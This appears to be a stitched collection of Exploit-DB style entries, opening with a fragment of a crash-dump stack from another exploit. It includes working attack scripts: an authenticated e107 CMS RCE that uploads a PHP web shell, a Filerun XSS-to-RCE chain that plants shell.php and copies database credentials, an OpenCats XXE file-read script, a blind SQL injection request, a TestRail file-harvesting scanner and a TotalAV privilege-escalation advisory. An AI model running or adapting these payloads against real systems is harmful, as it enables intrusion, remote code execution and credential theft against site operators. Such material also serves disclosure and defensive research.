41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141
41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141
41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141
41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141
00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141
00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f
00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0
# Exploit Title: TotalAV 5.15.69 - Unquoted Service Path
# Date: 22/09/2021
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.totalav.com
# Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe
# Version: 5.15.69
# Tested on: Windows 10 Pro 20H2 and 21H1 x64
The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service
services from TotalAV version 5.15.69 are affected by unquoted service path (CWE-428) vulnerability which may allow a
user to gain SYSTEM privileges since they all running with higher privileges. To exploit the vulnerability is possible
to place executable(s) following the path of the unquoted string.
Affected excecutables services: SecurityService, SecurityServiceMonitor, AMSProtectedService:
PC Security Management Service SecurityService C:\Program Files (x86)\TotalAV\SecurityService.exe Auto
PC Security Management Monitoring Service SecurityServiceMonitor C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor Auto
Anti-Malware SDK Protected Service AMSProtectedService C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe Auto
C:\Users\user>sc qc SecurityService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: SecurityService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : PC Security Management Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\Users\user>sc qc SecurityServiceMonitor
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: SecurityServiceMonitor
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : PC Security Management Monitoring Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\Users\user>sc qc AMSProtectedService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: AMSProtectedService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : Anti-Malware SDK Protected Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
# Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 21-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.0
# Category: Webapps
# Tested on: Linux/Windows
# e107 is a free website content management system
# Includes an endpoint that allows remote access
# Theme page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.
# The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures!
# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h
from time import sleep
import requests
import argparse
def main():
parser = argparse.ArgumentParser(
description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)'
)
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-l', '--login', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)
def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
# Check Host Status
try:
response = requests.get(args.host)
if response.status_code != 200:
print("[-] Address not reachable!")
sleep(2)
exit(1)
else:
check(args)
except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)
def check(args):
response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami")
if response.status_code == 200:
print("[*] Exploit File Exists!\n")
sleep(2)
exploit(args)
else:
login(args)
def login(args):
url = args.host + "/e107_admin/admin.php"
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/e107_admin/admin.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"}
response = requests.post(url, headers=headers, data=data, allow_redirects=False)
new_cookie = response.cookies.get("MySi_cookieSID")
if (response.headers.get("Location") == "admin.php?failed"):
print("[-] Login Failed...\n")
print("Your username or password is incorrect.")
sleep(2)
exit(1)
else:
print("[+] Success Login...\n")
sleep(2)
install(args, new_cookie)
def install(args, new_cookie):
url = args.host + "/e107_admin/theme.php"
cookies = {
"MySi_cookieSID": new_cookie,
"e107_tzOffset": "-180"}
headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Origin": args.host,
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload",
"Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n"
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
if (response.status_code == 301):
print("[!] Unauthorized user!\n\n")
print("Requires user with add theme permissions.")
sleep(2)
exit(1)
else:
print("[!] Upload Vuln File!\n")
sleep(2)
exploit(args)
def exploit(args):
print("[+] Exploit Done!\n")
sleep(2)
while True:
cmd = input("$ ")
url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}
response = requests.post(url, headers=headers, timeout=5)
if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)
if __name__ == '__main__':
main()
# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 09/21/2021
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image
# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution
import requests
import time
import sys
# this is the plain version of the payload below
"""
var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel§ion=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #";
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == XMLHttpRequest.DONE) {
if (xmlhttp.status == 200) {
console.log(xmlhttp.responseText);
}
}
};
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"""
if not len(sys.argv) == 2:
print("missing target url")
sys.exit(1)
target = sys.argv[1]
def inject_code():
payload = "var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";

xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	   else if (xmlhttp.status == 400) {
		  alert('There was an error 400');
	   }
	   else {
		   alert('something else other than 200 was returned');
	   }
	}
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"
req = requests.post(
"%s/?module=fileman&page=login&action=login" % target,
data={'username': 'nonexistend', 'password': 'wrong', 'otp':'',
'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
)
def check_shell_exists():
req = requests.get("%s/shell.php" % target)
if req.status_code != 200:
return False
return True
def process_command(command):
req = requests.get("%s/shell.php?cmd=%s" % (target, command))
print(req.text)
while True:
print("Injecting new log message...")
inject_code()
time.sleep(10)
if check_shell_exists():
print("Shell exists under '%s/shell.php?cmd=ls'" % target)
break
print("Lets get autoconfig.php which contains database credentials...")
process_command("cp system/data/autoconfig.php js/autoconfig.txt")
ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
ac_f.write(ac_resp.content)
process_command("rm js/autoconfig.php")
while True:
command = input("Command:")
process_command(command)
# Exploit Title: Simple Attendance System 1.0 - Unauthenticated Blind SQLi
# Exploit Author: ()t/\/\1
# Date: September 21, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Tested on: Linux
# Version: v1.0
# Exploit Description:
The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'employee_code' POST parameter in 'http://127.0.0.1//attendance/Actions.php?a=save_attendance' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
# PoC request
POST /attendance/Actions.php?a=save_attendance HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/attendance/attendance.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 138
Connection: close
Cookie: PHPSESSID=11c4e96bb334b51540f4758e9d33885d
employee_code=2d'+OR+SUBSTR((select+user_id+from+user_list+where+username="admin"),1,1)="1"--&att_type_id=1&date_created=&att_type=Time+In
# Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)
# Date: 2021-09-20
# Exploit Author: Jake Ruston
# Vendor Homepage: https://opencats.org
# Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip
# Version: < 0.9.4-3
# Tested on: Linux
# CVE: 2019-13358
from argparse import ArgumentParser
from docx import Document
from zipfile import ZipFile
from base64 import b64decode
import requests
import re
xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
<w:body>
<w:p>
<w:r>
<w:t>START&file;END</w:t>
</w:r>
</w:p>
<w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
<w:pgSz w:w="12240" w:h="15840"/>
<w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
<w:cols w:space="720"/>
<w:docGrid w:linePitch="360"/>
</w:sectPr>
</w:body>
</w:document>
"""
class CVE_2019_13358:
def __init__(self):
self.args = self.parse_arguments()
def parse_arguments(self):
parser = ArgumentParser()
required = parser.add_argument_group("required arguments")
required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True)
required.add_argument("--file", help="the remote file to read", required=True)
args = parser.parse_args()
if not args.url.startswith("http"):
args.url = f"http://{args.url}"
args.url = f"{args.url}/careers/index.php"
return args
def create_resume(self):
document = Document()
document.add_paragraph()
document.save("resume.docx")
def update_resume(self):
with ZipFile("resume.docx", "r") as resume:
resume.extractall()
with open("word/document.xml", "w") as document:
document.write(xml.format(self.args.file).strip())
with ZipFile("resume.docx", "w") as resume:
resume.write("word/document.xml")
def get(self):
params = { "m": "careers", "p": "showAll" }
try:
request = requests.get(self.args.url, params=params)
except Exception as e:
raise Exception("Failed to GET to the URL provided", e)
id = re.search(r"ID=([0-9])*", request.text)
if id is None:
raise Exception("No vacancies were found")
return id.group(1)
def post(self, id):
params = { "m": "careers", "p": "onApplyToJobOrder" }
files = {
"ID": (None, id),
"candidateID": (None, -1),
"applyToJobSubAction": (None, "resumeLoad"),
"file": (None, ""),
"resumeFile": open("resume.docx", "rb"),
"resumeContents": (None, ""),
"firstName": (None, ""),
"lastName": (None, ""),
"email": (None, ""),
"emailconfirm": (None, ""),
"phoneHome": (None, ""),
"phoneCell": (None, ""),
"phone": (None, ""),
"bestTimeToCall": (None, ""),
"address": (None, ""),
"city": (None, ""),
"state": (None, ""),
"zip": (None, ""),
"keySkills": (None, "")
}
try:
request = requests.post(self.args.url, params=params, files=files)
except Exception as e:
raise Exception("Failed to POST to the URL provided", e)
start = request.text.find("START")
end = request.text.find("END")
file = request.text[start + 5:end].strip()
try:
file = b64decode(file)
file = file.decode("ascii").strip()
except:
raise Exception("File not found")
print(file)
def run(self):
self.create_resume()
self.update_resume()
id = self.get()
self.post(id)
CVE_2019_13358().run()
# Exploit Title: Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
# Date: 22/09/2022
# Exploit Author: Sick Codes & JohnJHacking (Sakura Samuraii)
# Vendor Homepage: https://www.gurock.com/testrail/
# Version: 7.2.0.3014 and below
# Tested on: macOS, Linux, Windows
# CVE : CVE-2021-40875
# Reference: https://johnjhacking.com/blog/cve-2021-40875/
CVE-2021-40875: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
# Method 1
#!/bin/bash
# Author: sickcodes & johnjhacking
# Contact: https://twitter.com/sickcodes
# https://github.com/SakuraSamuraii/derailed
# Copyright: sickcodes (C) 2021
# License: GPLv3+
# stop null byte error while curling
shopt -s nullglob
! [ "${1}" ] && { echo "No target was specified. ./script.sh 'https://target/'" && exit 1 ; }
TARGET="${1}"
wget https://raw.githubusercontent.com/SakuraSamuraii/derailed/main/files.md5.txt
FILE_LIST="${PWD}/files.md5.txt"
mkdir -p ./output
cd ./output
touch ./accessible.log
# option to get a fresh updated files.md5, if it comes in a future version
# curl "${TARGET}/files.md5" > ./files.md5
while read -r HASH SUFFIX; do
echo "${SUFFIX}"
TESTING_URL="${TARGET}/${SUFFIX}"
echo "========= ${TESTING_URL} ========="
# Ignore list, some of these files MAY be world readable,
# if the organisation has modified permissions related
# to the below files otherwise, they are ignored.
case "${SUFFIX}" in
*'.php' ) continue
;;
*'.html' ) continue
;;
*'LICENSE' ) continue
;;
*'README.md' ) continue
;;
*'.js' ) continue
;;
*'.svg' ) continue
;;
*'.gif' ) continue
;;
*'.png' ) continue
;;
*'.css' ) continue
;;
*'.exe' ) continue
;;
# *'.add_your_own' ) continue
# ;;
esac
# peek at page response
# doesn't work because gurock returns 200 and prints the error in plaintext
# curl -s -I -X POST "${TESTING_URL}"
# feth the page, following redirects, to a variable
OUTPUT_DATA="$(curl -L -vvvv "${TESTING_URL}")"
# find matching disqualifying pharses in the page contents
# and pass any pages that are "denied access" or "direct script access"
case "${OUTPUT_DATA}" in
*'No direct script'* ) continue
;;
*'Directory Listing Denied'* ) continue
;;
esac
# save all interesting pages, without forward slashes
# https://www.target/
# will be saved as:
# https:::www.target <http://www.target>:
tee "${SUFFIX//\//\:}" <<< "${OUTPUT_DATA}"
# print to stdout, and also append to ./accessible.log the successful saves
tee -a ./accessible.log <<< "${TESTING_URL}"
done < "${FILE_LIST}"
### Results
in your results folder you will have a few important files from the host, namely the initial SQL database insert statements with specific unique information pertaining to that server running Gurock Testrail 7.2.0.3014 and below